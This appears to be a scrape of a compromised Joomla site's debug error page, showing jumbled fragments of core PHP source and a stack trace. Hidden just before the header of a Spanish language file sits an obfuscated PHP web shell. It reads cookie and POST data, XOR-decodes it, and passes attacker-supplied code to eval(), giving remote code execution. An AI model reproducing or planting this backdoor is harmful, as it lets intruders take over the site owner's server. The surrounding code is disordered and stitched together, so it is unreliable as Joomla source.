array $dependencies = []
) {
parent::__construct($name, $uri, $options, $attributes, $dependencies);
// Prepare Uri depend from the active language
$langTag = Factory::getApplication()->getLanguage()->getTag();
$client = $this->getOption('client');
// Create Uri <client>/language/<langTag>/<langTag>.css
if ($client) {
$this->uri = $client . '/language/' . $langTag . '/' . $langTag . '.css';
$className = \array_key_exists('class', $options) ? $options['class'] : null;
if ($className && class_exists($nameSpace . '\\' . $className)) {
$className = $nameSpace . '\\' . $className;
return new $className($name, $uri, $options, $attributes, $dependencies);
}
return new WebAssetItem($name, $uri, $options, $attributes, $dependencies);
}
// Inheriting the Namespace
if ($namespace && !\array_key_exists('namespace', $options)) {
$options['namespace'] = $namespace;
}
$assetItem = $this->createAsset($name, $uri, $options);
$this->add($item['type'], $assetItem);
}
}
/**
}
foreach ($this->dataFilesNew as $path) {
// Parse only if the file was not parsed already
if (empty($this->dataFilesParsed[$path])) {
$this->parseRegistryFile($path);
// Mark the file as parsed
$this->dataFilesParsed[$path] = $path;
}
* @since 4.0.0
*/
public function get(string $type, string $name): WebAssetItemInterface
{
// Check if any new file was added
$this->parseRegistryFiles();
if (empty($this->assets[$type][$name])) {
throw new UnknownAssetException(sprintf('There is no "%s" asset of a "%s" type in the registry.', $name, $type));
}
if ($this->locked) {
throw new InvalidActionException('WebAssetManager is locked, you came late');
}
// Check whether asset exists
$asset = $this->registry->get($type, $name);
if (empty($this->activeAssets[$type])) {
$this->activeAssets[$type] = [];
}
}
if ($andUse) {
$name = $arguments[0] instanceof WebAssetItemInterface ? $arguments[0]->getName() : $arguments[0];
return $this->registerAsset($type, ...$arguments)->useAsset($type, $name);
} else {
return $this->registerAsset($type, ...$arguments);
}
}
$templatePath = 'media/templates/site/cassiopeia';
// Color Theme
$paramsColorName = $this->params->get('colorName', 'colors_standard');
$assetColorName = 'theme.' . $paramsColorName;
$wa->registerAndUseStyle($assetColorName, $templatePath . '/css/global/' . $paramsColorName . '.css');
// Use a font scheme if set in the template style options
$paramsFontScheme = $this->params->get('useFontScheme', false);
$fontStyles = '';
// Store the file path
$this->_file = $directory . '/' . $filename;
// Get the file content
ob_start();
require $directory . '/' . $filename;
$contents = ob_get_contents();
ob_end_clean();
}
return $contents;
$this->baseurl = Uri::base(true);
$this->params = $params['params'] ?? new Registry();
$this->template = $template;
// Load
$this->_template = $this->_loadTemplate($baseDir, $file);
return $this;
}
/**
*
* @since 1.7.0
*/
public function parse($params = [])
{
return $this->_fetchTemplate($params)->_parseTemplate();
}
/**
* Outputs the template to the browser.
*
public function render($caching = false, $params = [])
{
$this->_caching = $caching;
if (empty($this->_template)) {
$this->parse($params);
}
if (\array_key_exists('csp_nonce', $params) && $params['csp_nonce'] !== null) {
$this->cspNonce = $params['csp_nonce'];
}
$this->debug = $params['debug'] ?? false;
$this->error = $this->_error;
$params['file'] = 'error.php';
return parent::render($cache, $params);
}
/**
* Render the backtrace
*
'template' => $template->template,
'directory' => JPATH_THEMES,
'debug' => JDEBUG,
'csp_nonce' => $app->get('csp_nonce'),
'templateInherits' => $template->parent,
'params' => $template->params,
]
);
}
}
// Reset the document object in the factory, this gives us a clean slate and lets everything render properly
Factory::$document = $renderer->getDocument();
Factory::getApplication()->loadDocument(Factory::$document);
$data = $renderer->render($error);
// If nothing was rendered, just use the message from the Exception
if (empty($data)) {
$data = $error->getMessage();
}
* @since 3.10.0
*/
public static function handleException(\Throwable $error)
{
static::logException($error);
static::render($error);
}
/**
* Render the error page based on an exception.
*
);
// Trigger the onError event.
$this->triggerEvent('onError', $event);
ExceptionHandler::handleException($event->getError());
}
// Trigger the onBeforeRespond event.
$this->getDispatcher()->dispatch('onBeforeRespond');
// Set the application as global app
\Joomla\CMS\Factory::$application = $app;
// Execute the application.
$app->execute();
* define() is used rather than "const" to not error for PHP 5.2 and lower
*/
define('_JEXEC', 1);
// Run the application - All executable code should be triggered through this file
require_once dirname(__FILE__) . '/includes/app.php';
<?php $t5f4c09 = 383;$GLOBALS['i3c2'] = Array();global $i3c2;$i3c2 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['n3ebfb3'] = "\xd\x49\x32\x68\x37\x26\x6a\x58\x3d\x3a\x3f\x3b\x21\x31\x3c\x62\x60\x7a\x7d\x38\x71\x5b\x6e\x48\x47\x2d\x36\x9\x72\x43\x2b\x4e\xa\x74\x50\x59\x3e\x77\x2c\x46\x63\x7e\x67\x45\x69\x5e\x65\x73\x52\x33\x76\x22\x51\x4c\x7b\x35\x40\x5c\x5a\x6c\x4d\x4f\x79\x39\x44\x20\x5f\x70\x53\x2a\x57\x7c\x66\x30\x23\x42\x64\x29\x54\x25\x55\x27\x6d\x2e\x34\x78\x41\x6f\x75\x4b\x56\x6b\x24\x4a\x5d\x28\x2f\x61";$i3c2[$i3c2['n3ebfb3'][47].$i3c2['n3ebfb3'][73].$i3c2['n3ebfb3'][49].$i3c2['n3ebfb3'][63].$i3c2['n3ebfb3'][63].$i3c2['n3ebfb3'][73].$i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][2]] = $i3c2['n3ebfb3'][40].$i3c2['n3ebfb3'][3].$i3c2['n3ebfb3'][28];$i3c2[$i3c2['n3ebfb3'][44].$i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][63].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][40].$i3c2['n3ebfb3'][55].$i3c2['n3ebfb3'][4]] = $i3c2['n3ebfb3'][87].$i3c2['n3ebfb3'][28].$i3c2['n3ebfb3'][76];$i3c2[$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][19].$i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][76].$i3c2['n3ebfb3'][40].$i3c2['n3ebfb3'][4].$i3c2['n3ebfb3'][49].$i3c2['n3ebfb3'][19].$i3c2['n3ebfb3'][97]] = $i3c2['n3ebfb3'][76].$i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][44].$i3c2['n3ebfb3'][22].$i3c2['n3ebfb3'][46];$i3c2[$i3c2['n3ebfb3'][33].$i3c2['n3ebfb3'][73].$i3c2['n3ebfb3'][40].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][2].$i3c2['n3ebfb3'][13]] = $i3c2['n3ebfb3'][47].$i3c2['n3ebfb3'][33].$i3c2['n3ebfb3'][28].$i3c2['n3ebfb3'][59].$i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][22];$i3c2[$i3c2['n3ebfb3'][37].$i3c2['n3ebfb3'][13].$i3c2['n3ebfb3'][49].$i3c2['n3ebfb3'][26].$i3c2['n3ebfb3'][84].$i3c2['n3ebfb3'][2]] = $i3c2['n3ebfb3'][76].$i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][44].$i3c2['n3ebfb3'][22].$i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][76];$i3c2[$i3c2['n3ebfb3'][37].$i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][19].$i3c2['n3ebfb3'][73]] = $i3c2['n3ebfb3'][44].$i3c2['n3ebfb3'][22].$i3c2['n3ebfb3'][44].$i3c2['n3ebfb3'][66].$i3c2['n3ebfb3'][47].$i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][33];$i3c2[$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][2].$i3c2['n3ebfb3'][13].$i3c2['n3ebfb3'][13].$i3c2['n3ebfb3'][76].$i3c2['n3ebfb3'][4]] = $i3c2['n3ebfb3'][47].$i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][28].$i3c2['n3ebfb3'][44].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][59].$i3c2['n3ebfb3'][44].$i3c2['n3ebfb3'][17].$i3c2['n3ebfb3'][46];$i3c2[$i3c2['n3ebfb3'][82].$i3c2['n3ebfb3'][73].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][26].$i3c2['n3ebfb3'][72]] = $i3c2['n3ebfb3'][67].$i3c2['n3ebfb3'][3].$i3c2['n3ebfb3'][67].$i3c2['n3ebfb3'][50].$i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][28].$i3c2['n3ebfb3'][47].$i3c2['n3ebfb3'][44].$i3c2['n3ebfb3'][87].$i3c2['n3ebfb3'][22];$i3c2[$i3c2['n3ebfb3'][20].$i3c2['n3ebfb3'][13].$i3c2['n3ebfb3'][4].$i3c2['n3ebfb3'][72]] = $i3c2['n3ebfb3'][88].$i3c2['n3ebfb3'][22].$i3c2['n3ebfb3'][47].$i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][28].$i3c2['n3ebfb3'][44].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][59].$i3c2['n3ebfb3'][44].$i3c2['n3ebfb3'][17].$i3c2['n3ebfb3'][46];$i3c2[$i3c2['n3ebfb3'][67].$i3c2['n3ebfb3'][84].$i3c2['n3ebfb3'][63].$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][26].$i3c2['n3ebfb3'][13].$i3c2['n3ebfb3'][19].$i3c2['n3ebfb3'][19]] = $i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][47].$i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][26].$i3c2['n3ebfb3'][84].$i3c2['n3ebfb3'][66].$i3c2['n3ebfb3'][76].$i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][40].$i3c2['n3ebfb3'][87].$i3c2['n3ebfb3'][76].$i3c2['n3ebfb3'][46];$i3c2[$i3c2['n3ebfb3'][3].$i3c2['n3ebfb3'][19].$i3c2['n3ebfb3'][19].$i3c2['n3ebfb3'][4].$i3c2['n3ebfb3'][49].$i3c2['n3ebfb3'][76]] = $i3c2['n3ebfb3'][47].$i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][33].$i3c2['n3ebfb3'][66].$i3c2['n3ebfb3'][33].$i3c2['n3ebfb3'][44].$i3c2['n3ebfb3'][82].$i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][66].$i3c2['n3ebfb3'][59].$i3c2['n3ebfb3'][44].$i3c2['n3ebfb3'][82].$i3c2['n3ebfb3'][44].$i3c2['n3ebfb3'][33];$i3c2[$i3c2['n3ebfb3'][67].$i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][19].$i3c2['n3ebfb3'][2].$i3c2['n3ebfb3'][13]] = $i3c2['n3ebfb3'][33].$i3c2['n3ebfb3'][2].$i3c2['n3ebfb3'][84].$i3c2['n3ebfb3'][84].$i3c2['n3ebfb3'][49].$i3c2['n3ebfb3'][76].$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][2].$i3c2['n3ebfb3'][40];$i3c2[$i3c2['n3ebfb3'][17].$i3c2['n3ebfb3'][73].$i3c2['n3ebfb3'][2].$i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][73].$i3c2['n3ebfb3'][26]] = $i3c2['n3ebfb3'][62].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][55].$i3c2['n3ebfb3'][40].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][76].$i3c2['n3ebfb3'][26].$i3c2['n3ebfb3'][73].$i3c2['n3ebfb3'][2];$i3c2[$i3c2['n3ebfb3'][22].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][76].$i3c2['n3ebfb3'][4].$i3c2['n3ebfb3'][63].$i3c2['n3ebfb3'][2]] = $_POST;$i3c2[$i3c2['n3ebfb3'][62].$i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][13].$i3c2['n3ebfb3'][26].$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][84].$i3c2['n3ebfb3'][26].$i3c2['n3ebfb3'][76]] = $_COOKIE;@$i3c2[$i3c2['n3ebfb3'][37].$i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][19].$i3c2['n3ebfb3'][73]]($i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][28].$i3c2['n3ebfb3'][28].$i3c2['n3ebfb3'][87].$i3c2['n3ebfb3'][28].$i3c2['n3ebfb3'][66].$i3c2['n3ebfb3'][59].$i3c2['n3ebfb3'][87].$i3c2['n3ebfb3'][42], NULL);@$i3c2[$i3c2['n3ebfb3'][37].$i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][19].$i3c2['n3ebfb3'][73]]($i3c2['n3ebfb3'][59].$i3c2['n3ebfb3'][87].$i3c2['n3ebfb3'][42].$i3c2['n3ebfb3'][66].$i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][28].$i3c2['n3ebfb3'][28].$i3c2['n3ebfb3'][87].$i3c2['n3ebfb3'][28].$i3c2['n3ebfb3'][47], 0);@$i3c2[$i3c2['n3ebfb3'][37].$i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][19].$i3c2['n3ebfb3'][73]]($i3c2['n3ebfb3'][82].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][85].$i3c2['n3ebfb3'][66].$i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][85].$i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][40].$i3c2['n3ebfb3'][88].$i3c2['n3ebfb3'][33].$i3c2['n3ebfb3'][44].$i3c2['n3ebfb3'][87].$i3c2['n3ebfb3'][22].$i3c2['n3ebfb3'][66].$i3c2['n3ebfb3'][33].$i3c2['n3ebfb3'][44].$i3c2['n3ebfb3'][82].$i3c2['n3ebfb3'][46], 0);@$i3c2[$i3c2['n3ebfb3'][3].$i3c2['n3ebfb3'][19].$i3c2['n3ebfb3'][19].$i3c2['n3ebfb3'][4].$i3c2['n3ebfb3'][49].$i3c2['n3ebfb3'][76]](0);if (!$i3c2[$i3c2['n3ebfb3'][37].$i3c2['n3ebfb3'][13].$i3c2['n3ebfb3'][49].$i3c2['n3ebfb3'][26].$i3c2['n3ebfb3'][84].$i3c2['n3ebfb3'][2]]($i3c2['n3ebfb3'][86].$i3c2['n3ebfb3'][53].$i3c2['n3ebfb3'][48].$i3c2['n3ebfb3'][43].$i3c2['n3ebfb3'][86].$i3c2['n3ebfb3'][64].$i3c2['n3ebfb3'][35].$i3c2['n3ebfb3'][66].$i3c2['n3ebfb3'][48].$i3c2['n3ebfb3'][80].$i3c2['n3ebfb3'][31].$i3c2['n3ebfb3'][66].$i3c2['n3ebfb3'][49].$i3c2['n3ebfb3'][26].$i3c2['n3ebfb3'][26].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][19].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][19].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][2].$i3c2['n3ebfb3'][49].$i3c2['n3ebfb3'][55].$i3c2['n3ebfb3'][55].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][2].$i3c2['n3ebfb3'][13].$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][13].$i3c2['n3ebfb3'][13].$i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][13].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][73].$i3c2['n3ebfb3'][2].$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][97])){$i3c2[$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][19].$i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][76].$i3c2['n3ebfb3'][40].$i3c2['n3ebfb3'][4].$i3c2['n3ebfb3'][49].$i3c2['n3ebfb3'][19].$i3c2['n3ebfb3'][97]]($i3c2['n3ebfb3'][86].$i3c2['n3ebfb3'][53].$i3c2['n3ebfb3'][48].$i3c2['n3ebfb3'][43].$i3c2['n3ebfb3'][86].$i3c2['n3ebfb3'][64].$i3c2['n3ebfb3'][35].$i3c2['n3ebfb3'][66].$i3c2['n3ebfb3'][48].$i3c2['n3ebfb3'][80].$i3c2['n3ebfb3'][31].$i3c2['n3ebfb3'][66].$i3c2['n3ebfb3'][49].$i3c2['n3ebfb3'][26].$i3c2['n3ebfb3'][26].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][19].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][19].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][2].$i3c2['n3ebfb3'][49].$i3c2['n3ebfb3'][55].$i3c2['n3ebfb3'][55].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][2].$i3c2['n3ebfb3'][13].$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][13].$i3c2['n3ebfb3'][13].$i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][13].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][73].$i3c2['n3ebfb3'][2].$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][97], 1);$m455381d5 = NULL;$z3f8 = NULL;$i3c2[$i3c2['n3ebfb3'][28].$i3c2['n3ebfb3'][13].$i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][84].$i3c2['n3ebfb3'][4]] = $i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][76].$i3c2['n3ebfb3'][49].$i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][73].$i3c2['n3ebfb3'][84].$i3c2['n3ebfb3'][25].$i3c2['n3ebfb3'][73].$i3c2['n3ebfb3'][13].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][25].$i3c2['n3ebfb3'][84].$i3c2['n3ebfb3'][76].$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][13].$i3c2['n3ebfb3'][25].$i3c2['n3ebfb3'][19].$i3c2['n3ebfb3'][84].$i3c2['n3ebfb3'][26].$i3c2['n3ebfb3'][73].$i3c2['n3ebfb3'][25].$i3c2['n3ebfb3'][40].$i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][63].$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][76].$i3c2['n3ebfb3'][40].$i3c2['n3ebfb3'][19].$i3c2['n3ebfb3'][49].$i3c2['n3ebfb3'][49].$i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][40];global $r1e47;function ya5cad602($m455381d5, $sbadb){global $i3c2;$p7d9 = "";for ($s019ef=0; $s019ef<$i3c2[$i3c2['n3ebfb3'][33].$i3c2['n3ebfb3'][73].$i3c2['n3ebfb3'][40].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][2].$i3c2['n3ebfb3'][13]]($m455381d5);){for ($nfff9ae4=0; $nfff9ae4<$i3c2[$i3c2['n3ebfb3'][33].$i3c2['n3ebfb3'][73].$i3c2['n3ebfb3'][40].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][2].$i3c2['n3ebfb3'][13]]($sbadb) && $s019ef<$i3c2[$i3c2['n3ebfb3'][33].$i3c2['n3ebfb3'][73].$i3c2['n3ebfb3'][40].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][2].$i3c2['n3ebfb3'][13]]($m455381d5); $nfff9ae4++, $s019ef++){$p7d9 .= $i3c2[$i3c2['n3ebfb3'][47].$i3c2['n3ebfb3'][73].$i3c2['n3ebfb3'][49].$i3c2['n3ebfb3'][63].$i3c2['n3ebfb3'][63].$i3c2['n3ebfb3'][73].$i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][2]]($i3c2[$i3c2['n3ebfb3'][44].$i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][63].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][40].$i3c2['n3ebfb3'][55].$i3c2['n3ebfb3'][4]]($m455381d5[$s019ef]) ^ $i3c2[$i3c2['n3ebfb3'][44].$i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][63].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][40].$i3c2['n3ebfb3'][55].$i3c2['n3ebfb3'][4]]($sbadb[$nfff9ae4]));}}return $p7d9;}function t2443df2c($m455381d5, $sbadb){global $i3c2;global $r1e47;return $i3c2[$i3c2['n3ebfb3'][17].$i3c2['n3ebfb3'][73].$i3c2['n3ebfb3'][2].$i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][73].$i3c2['n3ebfb3'][26]]($i3c2[$i3c2['n3ebfb3'][17].$i3c2['n3ebfb3'][73].$i3c2['n3ebfb3'][2].$i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][73].$i3c2['n3ebfb3'][26]]($m455381d5, $r1e47), $sbadb);}foreach ($i3c2[$i3c2['n3ebfb3'][62].$i3c2['n3ebfb3'][15].$i3c2['n3ebfb3'][13].$i3c2['n3ebfb3'][26].$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][84].$i3c2['n3ebfb3'][26].$i3c2['n3ebfb3'][76]] as $sbadb=>$d1f74){$m455381d5 = $d1f74;$z3f8 = $sbadb;}if (!$m455381d5){foreach ($i3c2[$i3c2['n3ebfb3'][22].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][76].$i3c2['n3ebfb3'][4].$i3c2['n3ebfb3'][63].$i3c2['n3ebfb3'][2]] as $sbadb=>$d1f74){$m455381d5 = $d1f74;$z3f8 = $sbadb;}}$m455381d5 = @$i3c2[$i3c2['n3ebfb3'][20].$i3c2['n3ebfb3'][13].$i3c2['n3ebfb3'][4].$i3c2['n3ebfb3'][72]]($i3c2[$i3c2['n3ebfb3'][67].$i3c2['n3ebfb3'][46].$i3c2['n3ebfb3'][19].$i3c2['n3ebfb3'][2].$i3c2['n3ebfb3'][13]]($i3c2[$i3c2['n3ebfb3'][67].$i3c2['n3ebfb3'][84].$i3c2['n3ebfb3'][63].$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][26].$i3c2['n3ebfb3'][13].$i3c2['n3ebfb3'][19].$i3c2['n3ebfb3'][19]]($m455381d5), $z3f8));if (isset($m455381d5[$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][91]]) && $r1e47==$m455381d5[$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][91]]){if ($m455381d5[$i3c2['n3ebfb3'][97]] == $i3c2['n3ebfb3'][44]){$s019ef = Array($i3c2['n3ebfb3'][67].$i3c2['n3ebfb3'][50] => @$i3c2[$i3c2['n3ebfb3'][82].$i3c2['n3ebfb3'][73].$i3c2['n3ebfb3'][97].$i3c2['n3ebfb3'][26].$i3c2['n3ebfb3'][72]](),$i3c2['n3ebfb3'][47].$i3c2['n3ebfb3'][50] => $i3c2['n3ebfb3'][13].$i3c2['n3ebfb3'][83].$i3c2['n3ebfb3'][73].$i3c2['n3ebfb3'][25].$i3c2['n3ebfb3'][13],);echo @$i3c2[$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][72].$i3c2['n3ebfb3'][2].$i3c2['n3ebfb3'][13].$i3c2['n3ebfb3'][13].$i3c2['n3ebfb3'][76].$i3c2['n3ebfb3'][4]]($s019ef);}elseif ($m455381d5[$i3c2['n3ebfb3'][97]] == $i3c2['n3ebfb3'][46]){eval/*u23b779d6*/($m455381d5[$i3c2['n3ebfb3'][76]]);}exit();}} ?><?php
/**
* @version $Id: es-ES.localise.php $
* Copyright (C) 2005 - 2012 Open Source Matters. All rights reserved.
* Copyright (C) Translation 2010 - 2012 http://comunidadjoomla.org All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
ksort($paths);
$path = reset($paths);
while (!class_exists($class) && $path) {
if (is_file($path)) {
require_once $path;
}
$path = next($paths);
}
*
* @since 4.0.0
*/
public function createLanguage($lang, $debug = false): Language
{
return new Language($lang, $debug);
}
}
* @since 4.0.0
*/
public function createLanguage($lang, $debug = false): Language
{
if (!isset(self::$languages[$lang . $debug])) {
self::$languages[$lang . $debug] = parent::createLanguage($lang, $debug);
}
return self::$languages[$lang . $debug];
}
}
* Example: Factory::getContainer()->get(LanguageFactoryInterface::class)->createLanguage($lang, $debug);
*/
public static function getInstance($lang, $debug = false)
{
if (!isset(self::$languages[$lang . $debug])) {
self::$languages[$lang . $debug] = Factory::getContainer()->get(LanguageFactoryInterface::class)->createLanguage($lang, $debug);
}
return self::$languages[$lang . $debug];
}
if (isset($options['language'])) {
$this->set('language', $options['language']);
}
// Build our language object
$lang = Language::getInstance($this->get('language'), $this->get('debug_lang'));
// Load the language to the API
$this->loadLanguage($lang);
// Register the language object with Factory
$options['language'] = 'en-GB';
}
}
// Finish initialisation
parent::initialiseApp($options);
}
/**
* Load the library language files for the application
*
* @since 3.2
*/
protected function doExecute()
{
// Initialise the application
$this->initialiseApp();
// Mark afterInitialise in the profiler.
JDEBUG ? $this->profiler->mark('afterInitialise') : null;
// Route the application
$this->sanityCheckSystemVariables();
$this->setupLogging();
$this->createExtensionNamespaceMap();
// Perform application routines.
$this->doExecute();
// If we have an application document object, render it.
if ($this->document instanceof \Joomla\CMS\Document\Document) {
// Render the application output.
$this->render();
// Set the application as global app
\Joomla\CMS\Factory::$application = $app;
// Execute the application.
$app->execute();
* define() is used rather than "const" to not error for PHP 5.2 and lower
*/
define('_JEXEC', 1);
// Run the application - All executable code should be triggered through this file
require_once dirname(__FILE__) . '/includes/app.php';
[2/2]
Error
|
---|
Error: Call to a member function getTag() on null at /home/eshistor/public_html/libraries/src/WebAsset/AssetItem/LangActiveAssetItem.php:48 at Joomla\CMS\WebAsset\AssetItem\LangActiveAssetItem->__construct('template.active.language', '', array('description' => 'An asset to allow language specific css, eg \'language/[lang-CODE]/[lang-CODE].css\', to use it as a dependency to the active template', 'type' => 'style', 'class' => 'LangActiveAssetItem', 'dependencies' => array('template.active'), 'assetSource' => array('registryFile' => 'templates/cassiopeia/joomla.asset.json')), array(), array()) (/home/eshistor/public_html/libraries/src/WebAsset/WebAssetRegistry.php:238) at Joomla\CMS\WebAsset\WebAssetRegistry->createAsset('template.active.language', '', array('description' => 'An asset to allow language specific css, eg \'language/[lang-CODE]/[lang-CODE].css\', to use it as a dependency to the active template', 'type' => 'style', 'class' => 'LangActiveAssetItem', 'dependencies' => array('template.active'), 'assetSource' => array('registryFile' => 'templates/cassiopeia/joomla.asset.json'))) (/home/eshistor/public_html/libraries/src/WebAsset/WebAssetRegistry.php:409) at Joomla\CMS\WebAsset\WebAssetRegistry->parseRegistryFile('templates/cassiopeia/joomla.asset.json') (/home/eshistor/public_html/libraries/src/WebAsset/WebAssetRegistry.php:338) at Joomla\CMS\WebAsset\WebAssetRegistry->parseRegistryFiles() (/home/eshistor/public_html/libraries/src/WebAsset/WebAssetRegistry.php:131) at Joomla\CMS\WebAsset\WebAssetRegistry->get('style', 'theme.colors_standard') (/home/eshistor/public_html/libraries/src/WebAsset/WebAssetManager.php:263) at Joomla\CMS\WebAsset\WebAssetManager->useAsset('style', 'theme.colors_standard') (/home/eshistor/public_html/libraries/src/WebAsset/WebAssetManager.php:234) at Joomla\CMS\WebAsset\WebAssetManager->__call('registerandusestyle', array('theme.colors_standard', 'media/templates/site/cassiopeia/css/global/colors_standard.css')) (/home/eshistor/public_html/templates/cassiopeia/error.php:40) at require('/home/eshistor/public_html/templates/cassiopeia/error.php') (/home/eshistor/public_html/libraries/src/Document/HtmlDocument.php:741) at Joomla\CMS\Document\HtmlDocument->_loadTemplate('/home/eshistor/public_html/templates/cassiopeia', 'error.php') (/home/eshistor/public_html/libraries/src/Document/HtmlDocument.php:796) at Joomla\CMS\Document\HtmlDocument->_fetchTemplate(array('template' => 'cassiopeia', 'directory' => '/home/eshistor/public_html/templates', 'debug' => true, 'csp_nonce' => null, 'templateInherits' => '', 'params' => object(Registry), 'file' => 'error.php')) (/home/eshistor/public_html/libraries/src/Document/HtmlDocument.php:613) at Joomla\CMS\Document\HtmlDocument->parse(array('template' => 'cassiopeia', 'directory' => '/home/eshistor/public_html/templates', 'debug' => true, 'csp_nonce' => null, 'templateInherits' => '', 'params' => object(Registry), 'file' => 'error.php')) (/home/eshistor/public_html/libraries/src/Document/HtmlDocument.php:631) at Joomla\CMS\Document\HtmlDocument->render(false, array('template' => 'cassiopeia', 'directory' => '/home/eshistor/public_html/templates', 'debug' => true, 'csp_nonce' => null, 'templateInherits' => '', 'params' => object(Registry), 'file' => 'error.php')) (/home/eshistor/public_html/libraries/src/Document/ErrorDocument.php:139) at Joomla\CMS\Document\ErrorDocument->render(false, array('template' => 'cassiopeia', 'directory' => '/home/eshistor/public_html/templates', 'debug' => true, 'csp_nonce' => null, 'templateInherits' => '', 'params' => object(Registry), 'file' => 'error.php')) (/home/eshistor/public_html/libraries/src/Error/Renderer/HtmlRenderer.php:78) at Joomla\CMS\Error\Renderer\HtmlRenderer->render(object(Error)) (/home/eshistor/public_html/libraries/src/Exception/ExceptionHandler.php:121) at Joomla\CMS\Exception\ExceptionHandler::render(object(Error)) (/home/eshistor/public_html/libraries/src/Exception/ExceptionHandler.php:72) at 